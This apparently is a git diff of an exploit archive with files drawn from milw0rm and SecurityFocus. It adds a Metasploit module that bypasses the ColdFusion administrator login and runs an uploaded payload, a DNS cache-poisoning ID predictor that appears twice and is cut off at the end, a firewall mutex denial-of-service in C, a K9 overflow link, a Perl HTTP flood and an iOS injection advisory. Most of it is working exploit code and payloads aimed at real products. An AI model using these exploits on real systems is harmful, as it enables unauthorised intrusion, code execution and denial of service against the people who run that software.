// milw0rm.com [2004-06-25]
}
// milw0rm.com [2004-06-25]

111
platforms/multiple/dos/30139.c Executable file
View file

@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/24284/info
Outpost Firewall is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to block arbitrary processes, denying service to legitimate users.
This issue affects Outpost Firewall 4.0 build 1007.591.145 and build 964.582.059; other versions may also be affected.
/*
Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
void about(void)
{
printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
HANDLE capture_mutex(char *name)
{
wchar_t namew[MAX_PATH];
snwprintf(namew,MAX_PATH,L"%S",name);
UNICODE_STRING uniname;
RtlInitUnicodeString(&uniname,namew);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,&uniname,OBJ_CASE_INSENSITIVE | OBJ_OPENIF,0,NULL);
HANDLE mutex;
DWORD access=MUTANT_ALL_ACCESS;
NTSTATUS status=ZwOpenMutant(&mutex,access,&oa);
if (!NT_SUCCESS(status)) return 0;
printf("Mutex opened.\n");
if (WaitForSingleObject(mutex,5000)==WAIT_OBJECT_0) return mutex;
ZwClose(mutex);
return NULL;
}
int main(int argc,char **argv)
{
about();
if (argc!=1)
{
usage();
return 1;
}
while (1)
{
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
WinExec("cmd",SW_NORMAL);
} else
{
fprintf(stderr,"Unable to capture \"outpost_ipc_hdr\" mutex.\n");
break;
}
}
printf("\nTEST FAILED!\n");
return 1;
}

30
platforms/multiple/dos/30163.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/24373/info
K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.
An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.
K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.
<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>

11
platforms/multiple/dos/30187.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24454/info
Mbedthis AppWeb is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
This issue affects only applications that were built with logging enabled and installed with no "ErrorLog" directive in 'appweb.conf'.
Successful exploits may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely crash the application, denying further service to legitimate users.
AppWeb 2.2.2 is reported vulnerable; other versions may also be affected.
'GET %n://localhost:80/" request'

98
platforms/multiple/dos/8021.pl
View file

@ -1,49 +1,49 @@
#!usr/bin/perl -w
########################################################################################
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
# http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Visit: http://www.evilfingers.com/
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);
@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");
foreach $mal (@malicious_version)
{
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_server_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to connect to HTTP Server";
$http_attack = "GET / HTTP/$mal\r\n".
"Host: $vuln_server_ip\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n\r\n";
print $sock_http $http_attack;
sleep(3);
close($sock_http);
}
# milw0rm.com [2009-02-09]
#!usr/bin/perl -w
########################################################################################
#
# Reference:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0478
# http://www.securityfocus.com/bid/33604/discuss
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Visit: http://www.evilfingers.com/
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com\
# Blog: http://www.darshanams.blogspot.com/
# Date: 09th February, 2009
#
############Special thanx2 Joshua Morin, Mikko Varpiola, and Jukka Taimisto ############
########################################################################################
######Thanx to str0ke,milw0rm, @rp m@n,security folks and all INDIAN H@CKER$############
########################################################################################
use IO::Socket;
print("\nEnter IP Address of Vulnerable Server: \n");
$vuln_server_ip = <STDIN>;
chomp($vuln_server_ip);
@malicious_version=("9.9","%.%","%%","#.#","\$.\$","*.*","975.975","10000999");
foreach $mal (@malicious_version)
{
$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_server_ip,
PeerPort => 80,
Proto => 'tcp') || "Unable to connect to HTTP Server";
$http_attack = "GET / HTTP/$mal\r\n".
"Host: $vuln_server_ip\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n\r\n";
print $sock_http $http_attack;
sleep(3);
close($sock_http);
}
# milw0rm.com [2009-02-09]

245
platforms/multiple/local/30183.txt Executable file
View file

@ -0,0 +1,245 @@
Document Title:
===============
Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1165
Release Date:
=============
2013-12-09
Vulnerability Laboratory ID (VL-ID):
====================================
1165
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
View your entire photo library in a standard web browser! Show off your photos easily! Excellent for showing slides
during a meeting, browsing through friends photos and more!
- View your photos in a browser over WiFi
- Optional password protection
- Show albums, events, faces (your photo library needs to have these albums in order to show it)
- One click slideshows
- Easy navigation
- Supports bonjour publishing
(Copy of the Homepage: https://itunes.apple.com/app/id499204622 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SharkFood
Product: Air Gallery - Air Photo Browser iOS 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local command/path injection web vulnerabilities has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `devicename` value of the file dir und sub category `header` (header-title) section. Local attackers are
able to inject own malicious system specific commands or path value requests as the physical iOS hardware devicename. The execute of the injected
command or path request occurs with persistent attack vector in the index and sub category list of the web interface. The security risk of the local
command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Content > header-title
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
1.2
A local command/path injection web vulnerability has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The second local command/path inject vulnerability is located in the in the album name value of the web-interface index and sub category list module.
Local attackers are able to manipulate iOS device `photo app` (default) album names by the inject of a payload to the wrong encoded albumname input fields.
The execute of the injected command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.6(+).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction.
Successful exploitation of the vulnerability results unauthorized execution of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Poster > group-header > groupinfo
Vulnerable Parameter(s):
[+] album name
Affected Module(s):
[+] Index - Item Name List
[+] Sub Category - Title List
Proof of Concept (PoC):
=======================
1.1
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the settings menu in the mobile iOS and click the info button to have an influence on the devicename value
3. Now change the local devicename value to your own script code with a frame + local command inject settings or path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via browser the local service, the local command inject or unauthorized path request occurs in the header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Content > header-title > devicename
<div id="wrapper" class="fullSize">
<!-- header -->
<div id="header" class="content">
<span id="header-title">Air Photo Browser - devicename bkm?37 >"<<>"x<../[COMMAND/PATH INJECT VULNERABILITY!]></span></div>
<!-- column layout , thanks to Mattew James Tailor! - http://matthewjamestaylor.com/ --> ;)
<div class="colmask leftmenu" id="content-wrapper">
<div class="colright">
<div class="col1wrap">
<!-- right column -->
<div class="col1">
<div style="" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="images/placeholder.png">
<h3 id="group-info"></h3>
</div>
1.2
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the default photo app in the mobile iOS and click the edit or add button to have an influence on the local albumname value
Note: Now the attackers is able to change an exisiting albumname or can add a new album (name)
3. Include your own script code with a frame + local command inject settings or unauthorized path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via web-browser the local service (GET method - index)
Note: The local command inject or unauthorized path request occurs in the groupinfo of the group-header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Poster > group-header > groupinfo
<div class="col1">
<div style="display: block;" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="/api/poster/?group=0&subgroup=0">
<h3 id="group-info"><b>Photo Library</b> <span id="group-count">0 photos</span></h3>
</div><div style="height: 380.6px;" id="group-content" class="content airGallery">
There are no photos in this album</div>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The first local command/path inject web vulnerability can be patched by a secure encode and parse of the vulnerable devicename value in
the web interface header section.
1.2
The second local command/path inject web vulnerability can be patched by a secure parse of the vulnerable albumname value
in the web interface data context listing section.
Security Risk:
==============
1.1
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Local attackers are able to inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
1.2
The security risk of the second local command/path inject web vulnerability is estimated as high(-). Local attackers are able to
inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

315
platforms/multiple/remote/30210.rb Executable file
View file

@ -0,0 +1,315 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
Rank = GreatRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion 9 Administrative Login Bypass',
'Description' => %q{
Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication using the RDS component. Its password can
by default or by misconfiguration be set to an empty value. This allows you to create a session via the RDS login that
can be carried over to the admin web interface even though the passwords might be different. Therefore bypassing
authentication on the admin web interface which then could lead to arbitrary code execution.
Tested on Windows and Linux with ColdFusion 9.
},
'Author' =>
[
'Scott Buckel', # Vulnerability discovery
'Mekanismen <mattias[at]gotroot.eu>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ "CVE", "2013-0632" ],
[ "EDB", "27755" ],
[ "URL", "http://www.adobe.com/support/security/bulletins/apsb13-03.html" ]
],
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive, #thanks juan!
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
}
],
[ 'Linux',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 08 2013'
))
register_options(
[
OptString.new('EXTURL', [ false, 'An alternative host to request the CFML payload from', "" ]),
OptInt.new('HTTPDELAY', [false, 'Time that the HTTP Server will wait for the payload request', 10]),
], self.class)
register_advanced_options(
[
OptString.new('CFIDDIR', [ true, 'Alternative CFIDE directory', 'CFIDE'])
])
end
def check
uri = target_uri.path
#can we access the admin interface?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good "#{peer} - Administrator access available"
else
return Exploit::CheckCode::Safe
end
#is it cf9?
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'images', 'loginbackground.jpg')
})
img = Rex::Text.md5(res.body.to_s)
imghash = "596b3fc4f1a0b818979db1cf94a82220"
if img == imghash
print_good "#{peer} - ColdFusion 9 Detected"
else
return Exploit::CheckCode::Safe
end
#can we access the RDS component?
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
if res and res.code == 200 and res.body.to_s =~ /true/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
@pl = gen_file_dropper
@payload_url = ""
if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
upload_payload
exec_payload
end
end
def primer
@payload_url = get_uri
upload_payload
end
def on_request_uri(cli, request)
if request.uri =~ /#{get_resource}/
send_response(cli, @pl)
end
end
#task scheduler is pretty bad at handling binary files and likes to mess up our meterpreter :-(
#instead we use a CFML filedropper to embed our payload and execute it.
#this also removes the dependancy of using the probe.cfm to execute the file.
def gen_file_dropper
rand_var = rand_text_alpha(8+rand(8))
rand_file = rand_text_alpha(8+rand(8))
if datastore['TARGET'] == 0
rand_file += ".exe"
end
encoded_pl = Rex::Text.encode_base64(generate_payload_exe)
print_status "Building CFML shell..."
#embed payload
shell = ""
shell += " <cfset #{rand_var} = ToBinary( \"#{encoded_pl}\" ) />"
shell += " <cffile action=\"write\" output=\"##{rand_var}#\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
#if linux set correct permissions
if datastore['TARGET'] == 1
shell += " mode = \"700\""
end
shell += "/>"
#clean up our evil .cfm
shell += " <cffile action=\"delete\""
shell += " file= \"#GetDirectoryFromPath(GetCurrentTemplatePath())##listlast(cgi.script_name,\"/\")#\"/>"
#execute our payload!
shell += " <cfexecute"
shell += " name = \"#GetDirectoryFromPath(GetCurrentTemplatePath())##{rand_file}\""
shell += " arguments = \"\""
shell += " timeout = \"60\"/>"
return shell
end
def exec_payload
uri = target_uri.path
print_status("#{peer} - Our payload is at: #{peer}\\#{datastore['CFIDDIR']}\\#{@filename}")
print_status("#{peer} - Executing payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], @filename)
})
end
def upload_payload
uri = target_uri.path
@filename = rand_text_alpha(8+rand(8)) + ".cfm" #numbers is a bad idea
taskname = rand_text_alpha(8+rand(8)) #numbers is a bad idea
print_status "#{peer} - Trying to upload payload via scheduled task..."
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'adminapi', 'administrator.cfc'),
'vars_post' => {
'method' => "login",
'adminpassword' => "",
'rdsPasswordAllowed' => "1"
}
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - RDS component was unreachable")
end
#deal with annoying cookie data prepending (sunglasses)
cookie = res.get_cookies
if res and res.code == 200 and cookie =~ /CFAUTHORIZATION_cfadmin=;(.*)/
cookie = $1
else
fail_with(Failure::Unknown, "#{peer} - Unable to get auth cookie")
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'index.cfm'),
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /ColdFusion Administrator Login/
print_good("#{peer} - Logged in as Administrator!")
else
fail_with(Failure::Unknown, "#{peer} - Login Failed")
end
#get file path gogo
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'settings', 'mappings.cfm'),
'vars_get' => {
'name' => "/CFIDE"
},
'cookie' => cookie
})
unless res and res.code == 200
fail_with(Failure::Unknown, "#{peer} - Mappings URL was unreachable")
end
if res.body =~ /<input type="text" maxlength="550" name="directoryPath" value="(.*)" size="40" id="dirpath">/
file_path = $1
print_good("#{peer} - File path disclosed! #{file_path}")
else
fail_with(Failure::Unknown, "#{peer} - Unable to get upload filepath")
end
print_status("#{peer} - Adding scheduled task")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduleedit.cfm'),
'vars_post' => {
'TaskName' => taskname,
'Start_Date' => "Nov 1, 2420",
'End_Date' => "",
'Interval' => "",
'ScheduleType' => "Once",
'Operation' => "HTTPRequest",
'ScheduledURL' => @payload_url,
'publish' => "1",
'publish_file' => "#{file_path}\\#{@filename}",
'adminsubmit' => "Submit"
},
'cookie' => cookie
})
unless res and res.code == 200 or res.code == 302 #302s can happen but it still works, http black magic!
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Running scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'runtask' => taskname,
'timeout' => "0"
},
'cookie' => cookie
})
if res and res.code == 200 and res.body.to_s =~ /This scheduled task was completed successfully/
print_good("#{peer} - Scheduled task completed successfully")
else
fail_with(Failure::Unknown, "#{peer} - Scheduled task failed")
end
print_status("#{peer} - Deleting scheduled task")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, datastore['CFIDDIR'], 'administrator', 'scheduler', 'scheduletasks.cfm'),
'vars_get' => {
'action' => "delete",
'task' => taskname
},
'cookie' => cookie
})
unless res and res.code == 200
print_error("#{peer} - Scheduled task deletion failed, cleanup might be needed!")
end
end
end

456
platforms/multiple/remote/4266.py
View file

@ -1,228 +1,228 @@
#!/usr/bin/env python
"""
DNS Cache Poison v0.3beta by posedge
based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html
output: <time>:<ip>:<port>: id: <id> q: <query> g: <good> e: <error>
id: ID to predict
q: number of queries from the DNS server (only queries with LSB at 0 in ID)
g: number of good predicted IDs
e: number of errors while trying to predict a *supposed to be* predicted ID
"""
import socket, select, sys, time
from struct import unpack, pack
from socket import htons
_ANSWER_TIME_LIMIT = 1.0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
[<your_dns2_hostname>, <your_dns2_ip>], \
[<etc>, <etc>]]
class BINDSimplePredict:
def __init__(self, txid, bind_9_2_3___9_4_1=True):
self.txid = txid
self.cand = []
if bind_9_2_3___9_4_1 == True:
# For BIND9 v9.2.3-9.4.1:
self.tap1=0x80000057
self.tap2=0x80000062
else:
# For BIND9 v9.0.0-9.2.2:
self.tap1=0xc000002b # (0x80000057>>1)|(1<<31)
self.tap2=0xc0000061 # (0x800000c2>>1)|(1<<31)
self.next = self.run()
return
def run(self):
if (self.txid & 1) != 0:
#print "info: LSB is not 0. Can't predict the next transaction ID."
return False
#print "info: LSB is 0, predicting..."
# One bit shift (assuming the two lsb's are 0 and 0)
for msb in xrange(0, 2):
self.cand.append(((msb<<15)|(self.txid>>1)) & 0xFFFF)
# Two bit shift (assuming the two lsb's are 1 and 1)
# First shift (we know the lsb is 1 in both LFSRs):
v=self.txid
v=(v>>1)^self.tap1^self.tap2
if (v & 1) == 0:
# After the first shift, the lsb becomes 0, so the two LFSRs now have
# identical lsb's: 0 and 0 or 1 and 1
# Second shift:
v1=(v>>1) # 0 and 0
v2=(v>>1)^self.tap1^self.tap2 # 1 and 1
else:
# After the first shift, the lsb becomes 1, so the two LFSRs now have
# different lsb's: 1 and 0 or 0 and 1
# Second shift:
v1=(v>>1)^self.tap1 # 1 and 0
v2=(v>>1)^self.tap2 # 0 and 1
# Also need to enumerate over the 2 msb's we are clueless about
for msbits in xrange(0, 4):
self.cand.append(((msbits<<14)|v1) & 0xFFFF)
self.cand.append(((msbits<<14)|v2) & 0xFFFF)
return True;
class DNSData:
def __init__(self, data):
self.data=data
self.name=''
for i in xrange(12, len(data)):
self.name+=data[i]
if data[i] == '\x00':
break
q_type = unpack(">H", data[i+1:i+3])[0]
if q_type != 1: # only type: A (host address) allowed.
self.name = None
return
def response(self, ip=None):
packet=''
packet+=self.data[0:2] # id
packet+="\x84\x10" # flags
packet+="\x00\x01" # questions
packet+="\x00\x01" # answer RRS
packet+="\x00\x00" # authority RRS
packet+="\x00\x00" # additional RRS
packet+=self.name # queries: name
packet+="\x00\x01" # queries: type (A)
packet+="\x00\x01" # queries: class (IN)
packet+="\xc0\x0c" # answers: name
if ip == None:
packet+="\x00\x05" # answers: type (CNAME)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+=pack(">H", len(self.name)+2) # answers: data length
packet+="\x01" + "x" + self.name # answers: primary name
else:
packet+="\x00\x01" # answers: type (A)
packet+="\x00\x01" # answers: class (IN)
packet+="\x00\x00\x00\x01" # answers: time to live (1sec)
packet+="\x00\x04" # answers: data length
packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # IP
#packet+="\x00\x00\x29\x10\x00\x00\x00\x00\x00\x00\x00" # Additional
return packet
class DNSServer:
def __init__(self):
self.is_r = []
self.is_w = []
self.is_e = []
self.targets = []
self.named_conf = []
for i in xrange(len(_NAMED_CONF)):
start = 0
tmp = ''
for j in xrange(len(_NAMED_CONF[i][0])):
if _NAMED_CONF[i][0][j] == '.':
tmp += chr(j - start)
tmp += _NAMED_CONF[i][0][start:j]
start = j + 1
tmp += chr(j - start + 1)
tmp += _NAMED_CONF[i][0][start:] + "\x00"
self.named_conf.append([tmp, _NAMED_CONF[i][1]])
return
def run(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.s.bind(('',53))
self.is_r.append(self.s)
next = False
i = 0
while 1:
r, w, e = select.select(self.is_r, self.is_w, self.is_e, 1.0)
if r:
try:
data, addr = self.s.recvfrom(1024)
except socket.error:
continue
txid = unpack(">H", data[0:2])[0]
p=DNSData(data)
if p.name == None:
continue
found = False
for j in xrange(len(self.named_conf)):
if p.name == self.named_conf[j][0]:
found = True
break
if found == True:
self.s.sendto(p.response(self.named_conf[j][1]), addr)
continue
# FIXME: wrong code, 'i' is 0 at begin and when 1 item in list...
for i in xrange(len(self.targets)):
if self.targets[i][0] == addr[0]:
break
if i == len(self.targets):
self.targets.append([addr[0], False, time.time(), [None, None], \
None, 0, 0, 0])
if self.targets[i][1] == False:
bsp = BINDSimplePredict(txid)
self.targets[i][1] = bsp.next
self.targets[i][3][0] = bsp.cand
bsp = BINDSimplePredict(txid, False)
self.targets[i][3][1] = bsp.cand
else:
if p.name == self.targets[i][4]:
elapsed = time.time() - self.targets[i][2]
if elapsed > _ANSWER_TIME_LIMIT:
print 'info: slow answer, discarding (%.2f sec)' % elapsed
else:
self.targets[i][5] += 1
found_v1 = False
found_v2 = False
for j in xrange(10):
if self.targets[i][3][0][j] == txid:
found_v1 = True
break
if self.targets[i][3][1][j] == txid:
found_v2 = True
break
if found_v1 == True or found_v2 == True:
self.targets[i][6] += 1
else:
self.targets[i][7] += 1
# TODO: if found_v1 or found_v2 is True, then show bind version!
print "\n" + str(i) + ' target:', self.targets
print '%f:%s:%d: id: %04x q: %d g: %d e: %d' % (time.time(), \
addr[0], addr[1], txid, self.targets[i][5], \
self.targets[i][6], self.targets[i][7])
self.targets[i][1] = False
self.targets[i][2] = time.time()
self.targets[i][4] = "\x01" + "x" + p.name
self.s.sendto(p.response(), addr)
return
def close(self):
self.s.close()
return
if __name__ == '__main__':
dns_srv = DNSServer()
try:
dns_srv.run()
except KeyboardInterrupt:
print 'ctrl-c, leaving...'
dns_srv.close()
# milw0rm.com [2007-08-07]
#!/usr/bin/env python
"""
DNS Cache Poison v0.3beta by posedge
based on the Amit Klein paper: http://www.trusteer.com/docs/bind9dns.html
output: <time>:<ip>:<port>: id: <id> q: <query> g: <good> e: <error>
id: ID to predict
q: number of queries from the DNS server (only queries with LSB at 0 in ID)
g: number of good predicted IDs
e: number of errors while trying to predict a *supposed to be* predicted ID
"""
import socket, select, sys, time
from struct import unpack, pack
from socket import htons
_ANSWER_TIME_LIMIT = 1.0 # 1sec
_NAMED_CONF = [[<your_dns1_hostname>, <your_dns1_ip>], \
[<your_dns2_hostname>, <your_dns2_ip>], \
[<etc>, <etc>]]
class BINDSimplePredict:
def __init__(self, txid, bind_9_2_3___9_4_1=True):
self.txid = txid
self.cand = []
if bind_9_2_3___9_4_1 == True:
# For BIND9 v9.2.3-9.4.1:
self.tap1=0x80000057
self.tap2=0x80000062
else:
# For BIND9 v9.0.0-9.2.2:
